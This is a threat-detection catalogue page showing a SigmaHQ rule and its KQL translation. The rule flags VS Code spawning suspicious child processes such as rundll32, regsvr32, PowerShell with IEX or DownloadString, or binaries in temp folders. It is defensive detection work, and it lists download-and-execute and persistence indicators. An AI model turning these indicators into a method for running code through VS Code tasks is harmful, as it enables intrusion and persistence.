← Back to SOC feed Coverage →

Potentially Suspicious Child Process Of VsCode

sigma MEDIUM SigmaHQ
T1218T1202
imProcessCreate
persistence
This rule was pulled from an open-source repository and enriched with AI. Validate in a test environment before deploying to production.
View original rule at SigmaHQ →
Retrieved: 2026-05-23T11:00:00Z · Confidence: medium

Hunt Hypothesis

Detects uncommon or suspicious child processes spawning from a VsCode “code.exe” process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

Detection Rule

Sigma (Original)

title: Potentially Suspicious Child Process Of VsCode
id: 5a3164f2-b373-4152-93cf-090b13c12d27
status: test
description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
references:
    - https://twitter.com/nas_bench/status/1618021838407495681
    - https://twitter.com/nas_bench/status/1618021415852335105
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-26
modified: 2023-10-25
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
    - attack.t1202
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\code.exe'
    selection_children_images:
        Image|endswith:
            - '\calc.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\cscript.exe'
            - '\wscript.exe'
    selection_children_cli:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'Invoke-Expressions'
            - 'IEX'
            - 'Invoke-Command'
            - 'ICM'
            - 'DownloadString'
            - 'rundll32'
            - 'regsvr32'
            - 'wscript'
            - 'cscript'
    selection_children_paths:
        Image|contains:
            # Add more suspicious locations
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - ':\Temp\'
    condition: selection_parent and 1 of selection_children_*
falsepositives:
    - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly
level: medium

KQL (Azure Sentinel)

imProcessCreate
| where (ParentProcessName endswith "\\code.exe" or ActingProcessName endswith "\\code.exe") and ((TargetProcessName endswith "\\calc.exe" or TargetProcessName endswith "\\regsvr32.exe" or TargetProcessName endswith "\\rundll32.exe" or TargetProcessName endswith "\\cscript.exe" or TargetProcessName endswith "\\wscript.exe") or ((TargetProcessName endswith "\\powershell.exe" or TargetProcessName endswith "\\pwsh.exe" or TargetProcessName endswith "\\cmd.exe") and (TargetProcessCommandLine contains "Invoke-Expressions" or TargetProcessCommandLine contains "IEX" or TargetProcessCommandLine contains "Invoke-Command" or TargetProcessCommandLine contains "ICM" or TargetProcessCommandLine contains "DownloadString" or TargetProcessCommandLine contains "rundll32" or TargetProcessCommandLine contains "regsvr32" or TargetProcessCommandLine contains "wscript" or TargetProcessCommandLine contains "cscript")) or (TargetProcessName contains ":\\Users\\Public\\" or TargetProcessName contains ":\\Windows\\Temp\\" or TargetProcessName contains ":\\Temp\\"))

Required Data Sources

Sentinel TableNotes
imProcessCreateEnsure this data connector is enabled

False Positive Guidance

MITRE ATT&CK Context

References

Original source: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml